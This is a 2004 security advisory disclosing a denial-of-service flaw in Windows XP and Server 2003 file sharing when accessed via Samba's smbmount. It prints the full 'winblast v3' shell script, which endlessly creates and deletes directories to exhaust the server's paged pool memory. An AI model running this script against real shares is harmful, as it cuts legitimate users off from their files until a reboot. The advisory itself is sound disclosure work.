smbmountDoS.txt

`Announced: 2004-02-02  
Type: Denial of Service Attack on Windows  
Impact: smbmount can stop Windows from sharing files  
Writer: Daniel Kabs, Germany ([email protected])  
Credits: Thanks to Steve Ladjabi ([email protected])  
  
Contents:  
1. Abstract  
2. Affected Systems  
3. Attack Setup  
4. Symptoms   
5. Workaround  
  
  
1. Abstract  
  
A security vulnerability of "Windows XP" and "Windows 2003  
Server" has been found. Theses systems are open to a denial  
of service attack. If they share folders to a Unix client  
that is using smbmount (part of the Samba suite), any user  
on the client who has permissions to create directories on  
the mounted share can stop the Windows system from serving  
files. The attack induces a memory shortage on the Windows  
system by creating directories in a special way.  
  
2. Affected Systems  
  
This denial of service attack has been carried out  
successfully against  
- Microsoft Windows XP Professional, Service Pack 1  
- Microsoft Windows Server 2003  
  
Microsoft Windows 2000 Prof. and earlier versions of  
Windows are not affected by this attack.  
  
3. Attack Setup  
  
The attack was carried out successfully using  
- "Debian Linux", smbmount 3.0.0beta2  
- "Suse Linux 8.2", smbmount version 2.2.2  
as Unix clients  
  
The Windows system shares a folder. The Unix client mounts  
the share using smbmount. A user on the Unix client has  
write/create permissions to it the shared folder.  
  
The user on the client creates and deletes a lot of  
directories on the mounted share using the following  
script:  
  
#!/bin/sh  
# winblast v3 - DoS on WinXP, Win2003Srv  
# 2003-12-04 Steve Ladjabi  
  
count=0  
  
# using 'pathcount' directories  
pathcount=1000  
  
echo running \'winblast v3\' with $pathcount files in loop  
...  
  
while [ 1 ]; do  
p=$((pathcount*2-1))  
stop=$((pathcount-1))  
while [ "$p" != "$stop" ]; do  
dirname=wbst$p  
# delete old directory if it exists, exit on any error  
if [ -d $dirname ]; then  
rmdir $dirname || exit 3  
fi;  
  
# generating directory and exit on any error  
mkdir $dirname || exit 1  
p=$((p-1))  
count=$((count+1))  
done;  
echo $count directories generated ...  
done;  
#-- end --  
  
The script will create 1000 directories and then takes  
turns deleting and re-creating them. There will be no  
more than those 1000 directories at any time!  
  
Every time a directory is created, the Windows system  
allocates paged pool memory. This memory is not freed  
although the directory gets deleted.  
  
After having created and deleted 3.5 millions directories,  
the Windows system's paged pool memory has been depleted  
and it denies access to the share. One tested Windows XP  
system managed to take 5.8 millions directories until it  
stopped serving. This happens about 4 hours after the  
attack was started.  
  
4. Symptoms   
  
When the Windows system suddenly fails, it ceases serving,  
i.e. users can not access files nor list directory contents  
any more from the client. Any client will have lost its  
access the the share.  
  
On the Windows system the event log shows an error with  
event id 2020.  
  
Additionally, the Administrator of the Windows system can  
neither unshare the folder nor kill the session due to the  
lack of memory resources. Trying to open the managment  
console will result in error messages to this effect.  
Executing the command "net share /delete" fails due to  
the memory shortage.  
  
The only way to get the Windows system working again is  
to reboot it.  
  
Putting more RAM in the maching running Windows will not  
help as the paged pool memory is limited to 343MB. (See  
MS KB article Q312362).  
  
5. Workaround  
  
Administrator should schedule a daily reboot of the  
Windows system.  
`